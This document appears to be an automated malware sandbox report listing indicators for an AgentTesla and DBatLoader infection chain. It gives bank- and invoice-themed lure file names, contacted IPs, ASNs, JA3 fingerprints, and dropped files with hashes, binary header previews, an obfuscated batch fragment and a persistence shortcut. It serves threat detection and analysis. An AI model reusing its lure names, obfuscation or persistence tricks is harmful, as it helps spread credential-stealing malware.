	neworigin.exe	Get hash	malicious	AgentTesla	Browse	51.195.88.199
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse	51.195.88.199
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
api.ipify.org	MV BBG MUARA Ship's Particulars.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	CHARIKLIA JUNIOR DETAILS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse	104.26.12.205
	DATASHEET.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html	Get hash	malicious	Gabagool	Browse	104.26.12.205
	https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com	Get hash	malicious	Unknown	Browse	104.26.12.205
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.67.74.152
s-part-0035.t-0009.t-msedge.net	https://www.cognitoforms.com/f/fWhXKikFUk-rIZ2zs1gjVw/1	Get hash	malicious	Unknown	Browse	13.107.246.63
	November Billing.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	Quote Request.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	u.xls	Get hash	malicious	Braodo	Browse	13.107.246.63
	t.bat	Get hash	malicious	Braodo	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	payments.exe	Get hash	malicious	FormBook	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	13.107.246.63
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.63
	Rte_PRPay.docx	Get hash	malicious	Unknown	Browse	13.107.246.63
gxe0.com	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse	198.252.105.91
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HAWKHOSTCA	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	MV KODCO.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	198.252.105.91
	Arrival Notice_pdf.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	PROFORMA INVOICE.exe	Get hash	malicious	FormBook	Browse	198.252.98.54
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	198.252.105.91
CLOUDFLARENETUS	20bosemkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	172.65.251.78
	November Billing.html	Get hash	malicious	HTMLPhisher	Browse	104.21.6.54
	Quote Request.eml	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Quotation.exe	Get hash	malicious	FormBook	Browse	172.67.209.48
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	172.67.219.199
	injector V2.5.exe	Get hash	malicious	LummaC	Browse	104.21.43.198
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
	payments.exe	Get hash	malicious	FormBook	Browse	172.67.209.48
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	104.21.41.74
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	162.159.61.3
OVHFR	https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlD	Get hash	malicious	Unknown	Browse	54.36.91.62
	Kellyb Timesheet Report.pdf	Get hash	malicious	HTMLPhisher	Browse	164.132.95.123
	ngPebbPhbp.exe	Get hash	malicious	RHADAMANTHYS	Browse	51.75.171.9
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	213.186.33.5
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	213.186.33.5
	Demande de proposition du Fondation qu#U00e9b#U00e9coise du cancer.pdf	Get hash	malicious	Unknown	Browse	66.70.227.242
	AI_ChainedPackageFile.VistaSoftware.exe	Get hash	malicious	PureCrypter	Browse	167.114.47.186
	AaronGiles(1).exe	Get hash	malicious	PureCrypter	Browse	167.114.47.186
	740d3a.msi	Get hash	malicious	Unknown	Browse	167.114.47.186
	AI_ChainedPackageFile.VistaSoftware.exe	Get hash	malicious	PureCrypter	Browse	167.114.47.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	20bosemkt.bat	Get hash	malicious	Abobus Obfuscator	Browse	104.26.13.205
	OGo8AQxn4k.vbs	Get hash	malicious	Unknown	Browse	104.26.13.205
	3o2WdGwcLF.vbs	Get hash	malicious	Unknown	Browse	104.26.13.205
	https://amstoree.z13.web.core.windows.net/WinhelpSh0A057/index.html?Anph%5C=1-888-734-7204	Get hash	malicious	Unknown	Browse	104.26.13.205
	New PO 796512.exe	Get hash	malicious	FormBook	Browse	104.26.13.205
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	104.26.13.205
	https://spacardportal.works.com/gar	Get hash	malicious	Unknown	Browse	104.26.13.205
	Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnk	Get hash	malicious	Ducktail	Browse	104.26.13.205
	order requirements CIF-TRC809945210.exe	Get hash	malicious	GuLoader	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC	Browse	104.26.13.205
a0e9f5d64349fb13191bc781f81f42e1	u.xls	Get hash	malicious	Braodo	Browse	198.252.105.91
	injector V2.4.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	injector V2.5.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	198.252.105.91
	Loader.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	VMX.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	ADZ Laucher.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	Loader.exe	Get hash	malicious	LummaC	Browse	198.252.105.91
	Hexium.exe	Get hash	malicious	LummaC	Browse	198.252.105.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\lxsyrsiW.pif	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	x.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse
	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	NEOMS_EOI_FORM.cmd	Get hash	malicious	DBatLoader	Browse
	NEOMS_EOI_FORM.GZ	Get hash	malicious	DBatLoader	Browse
	r876789878767.cmd	Get hash	malicious	DBatLoader, FormBook	Browse

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	5.277756240469333
Encrypted:	false
SSDEEP:	12288:mImGUcsvZZdubv7hfl32Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlGsqjnhMgeiCl7G0nehbGZpbD
MD5:	02C8B645EF58F758FB3A3F22D1596223
SHA1:	623141D516EF872C032659ED89652FECAFD4D3B8
SHA-256:	5F39B17E2A09C53C781288E80690C75A15197148691A01AF3C3EC4B0FB8A9D07
SHA-512:	D2D88A317580361333FC09A1679FF4E334F3A72028124879D825FB98580D6EF5EC35ED25044A44C6B9DA517F2D486891AB61CF03D5538A958E6AD1B092C64323
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:p:p
MD5:	A5EA0AD9260B1550A14CC58D2C39B03D
SHA1:	F0AEDF295071ED34AB8C6A7692223D22B6A19841
SHA-256:	F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
SHA-512:	7C735C613ECE191801114785C1EE26A0485CBF1E8EE2C3B85BA1AD290EF75EEC9FEDE5E1A5DC26D504701F3542E6B6457818F4C1D62448D0DB40D5F35C357D74
Malicious:	false
Preview:	1..

C:\Users\Public\Libraries\Wisrysxl

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	data
Category:	dropped
Size (bytes):	1921890
Entropy (8bit):	7.398856770638502
Encrypted:	false
SSDEEP:	49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
MD5:	34E82F30B12F324DB1D2604CFA91CBB2
SHA1:	20001D49CD86B776EE8072A07F536B7330A77F97
SHA-256:	F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
SHA-512:	47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
Malicious:	true
Preview:	...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.

C:\Users\Public\Libraries\Wisrysxl.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1392640
Entropy (8bit):	7.401846851033825
Encrypted:	false
SSDEEP:	24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
MD5:	67DAC6AE9EE770115DB85CC71979DC41
SHA1:	A708539EBB312329F56F064A8491E4C6E1BD7CE8
SHA-256:	054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
SHA-512:	9FF88C70D4A2F7628A2F853D576B8E7D7EBF3409DE13D56895A06EB2FDC827BEEF45EC982DBC69A9577ED78D27D44F5DF2284CDF614BA4DEBADAF74CD07C204D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........x............@..............................................@...............................'...P...........................r..................................................h...<............................text....Z.......\.................. ..`.itext..L....p.......`.............. ..`.data...............j..............@....bss.....6...@....... ...................idata...'.......(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc...r.......t...J..............@..B.rsrc........P......................@..@.....................@..............@..@................................................................................................

C:\Users\Public\Libraries\lxsyrsiW.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Libraries\lxsyrsiW.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.328046551801531
Encrypted:	false
SSDEEP:	1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:	C116D3604CEAFE7057D77FF27552C215
SHA1:	452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:	7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:	9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: IBKB.vbs, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: x.exe, Detection: malicious, Browse Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse Filename: NEOMS_EOI_FORM.GZ, Detection: malicious, Browse Filename: r876789878767.cmd, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

C:\Users\Public\Wisrysxl.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.068087618209767
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxMI0P9ov:HRYFVmTWDyzPtZExMI0PKv
MD5:	FCB9942424DF88C9AB43E79DA670D456
SHA1:	D5A86203AC772BEEEF7822DD239D4EC449DBC2AC
SHA-256:	BB35018A03489EAF60F9453B0A49A8D09910AFF0545D24CCF4DBB9F04B758DDC
SHA-512:	A89EC897BCC3565E67F8FB7C0A70D0C1FD441221EA93045CC502C5C9CCA6E492E8C5F84D632E439E7159355A45AFC735C477AA83774363CB316D2EE7FAF58A96
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=910110..HotKey=84..

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\xpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.742964649637377
Encrypted:	false
SSDEEP:	384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:	B3624DD758CCECF93A1226CEF252CA12
SHA1:	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:	C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z.....................2......P4.......@....@..................................c....@...... ..........................`a..\|....p.. ...............................T............................................`..\............................text....)......................... ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379938008936079
Encrypted:	false
SSDEEP:	48:wWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyufF:wLHyIFKL3IZ2KRH9OugbfF
MD5:	C1B45B8B73E216268DDF7684520AD730
SHA1:	E577092396C480E98A03E10BB0CA3ED36135A864
SHA-256:	4E5A18090B1DBD9600A0447927A5487353F793A9DADA36D38671EDFF25B81897
SHA-512:	7AE4AEB38712B1AC3E7C4249FC540BAFA20A2A37D98EEB79862C0CB3562EACFB217691CA69598187191A316C8C2CB978E6562DFD547395AD6B956F63EF3C5105
Malicious:	false
Preview:	@...e.................................X..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0moxwmft.i0z.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibna5siq.erj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrpjcaz1.52d.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obrtyv3z.10u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
